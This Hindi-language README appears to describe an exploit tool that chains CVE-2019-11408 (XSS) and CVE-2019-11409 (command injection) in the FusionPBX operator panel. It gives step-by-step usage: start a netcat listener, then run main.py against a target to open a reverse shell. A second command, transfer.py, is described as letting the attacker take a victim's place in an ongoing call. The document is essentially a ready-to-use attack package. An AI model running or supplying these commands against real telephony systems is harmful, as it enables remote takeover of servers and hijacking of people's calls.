
श्रृंखला CVE-2019-11408 – ऑपरेटर पैनल में XSS और CVE-2019-11409 – ऑपरेटर पैनल में Command injection.
यह सरल कोड डस्टिन कॉब द्वारा RCE Using Caller ID – Multiple Vulnerabilities In FusionPBX में प्रस्तुत श्रृंखलित भेद्यता के कार्यान्वयन को पूरा करने का प्रयास करता है।
https://{fusionpbx_address}/app/operator_panel/index.php पर स्थित है।netcat लिसनर शुरू करें।python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}netcat लिसनर से कनेक्ट होगा और एक रिवर्स शेल प्रदान करेगा।जब हम किसी कॉल से Call-ID, from-tag और to-tag जानते हैं, तो नीचे दिए गए कोड को चलाने से आप कॉल में पीड़ित के स्थान पर आ जाएंगे।
python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}